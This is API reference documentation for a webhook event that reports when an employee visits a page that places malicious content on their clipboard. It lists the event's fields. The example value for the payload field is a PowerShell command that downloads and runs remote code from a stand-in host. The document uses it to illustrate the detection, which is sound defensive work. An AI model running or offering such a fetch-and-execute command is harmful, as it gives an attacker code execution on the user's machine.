# Malicious copy and paste detected Endpoint: POST malicious-copy-paste-detected Version: v1 Security: X-Signature ## Header parameters: - `X-Signature` (string, required) Example: "X-Signature: t=1492774577,v1=5257a869..." ## Request fields (application/json): - `version` (string) The version of the event. Example: "1" - `id` (string) The unique identifier for the event. This can be used as an idempotency key. Example: "c478966c-f927-411c-b919-179832d3d50c" - `timestamp` (integer) When the event occurred, formatted as a UNIX timestamp (in seconds). Example: 1698604061 - `category` (string) The category of the event. Enum: "CONTROL" - `description` (string) The description of the event. Note: this is subject to change and should not be used to match on this object. Example: "user@example.com visited https://evil.com which copied malicious content onto their clipboard" - `object` (string) The object that was created. Enum: "MALICIOUS_COPY_PASTE_DETECTED" - `friendlyName` (string) The friendly name of this object. Note: this is subject to change and should not be used to match on this object. Example: "Malicious copy and paste detected" - `new` (object) This object represents a malicious copy and paste detected event, indicating an employee visited a URL which copied malicious content into their clipboard. - `new.employee` (object) This object represents an employee in your organization. - `new.employee.id` (string) Unique identifier for the employee Example: "2a2197de-ad2c-47e4-8dcb-fb0f04cf83e0" - `new.employee.email` (string) Primary email address of the employee Example: "john.hill@example.com" - `new.employee.firstName` (string) First name of the employee Example: "John" - `new.employee.lastName` (string) Last name of the employee Example: "Hill" - `new.employee.department` (string) Department - as provided by connected API integrations Example: "Security Engineering" - `new.employee.location` (string) Location - as provided by connected API integrations Example: "New York" - `new.employee.licensed` (boolean) Whether the employee is licensed on the Push platform Example: true - `new.employee.creationTimestamp` (integer) When this employee was created, formatted as a UNIX timestamp (in seconds) Example: 1698669223 - `new.employee.chatopsEnabled` (boolean) Whether the employee has ChatOps enabledDeprecation notice: this value no longer does anything unless you still have access to the legacy Employee chat topics functionality on your account. It will be removed in the next API version. Example: true - `new.url` (string) The URL that triggered this detection. Example: "https://evil.com/okta.php" - `new.referrerUrl` (string,null) The URL the user was on before the malicious copy and paste was detected. Example: "https://statics.teams.cdn.office.net/" - `new.mode` (string,null) Mode that the malicious copy and paste detection control is in. Enum: "OFF", "MONITOR", "WARN", "BLOCK" - `new.payload` (string,null) The clipboard contents that triggered this alert. Example: "powershell -c iex(iwr -Uri example.com -UseBasicParsing)" - `new.action` (string,null) The action taken by the control when the malicious copy and paste was detected. Enum: "DISPLAYED", "IGNORED" - `new.sourceIpAddress` (string) The IP address of the user. Example: "8.158.25.38" - `new.browser` (any) The browser used by the employee Enum: "CHROME", "FIREFOX", "EDGE", "SAFARI", "OPERA", "BRAVE", "ARC", "ISLAND", "PRISMA_ACCESS", "UNKNOWN" - `new.os` (any) The OS used by the employee Enum: "MACOS", "WINDOWS", "LINUX", "CHROME_OS", "IOS", "ANDROID", "UNKNOWN" - `new.userAgent` (string) The user agent string reported by the browser. Example: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299" ## Response 2XX fields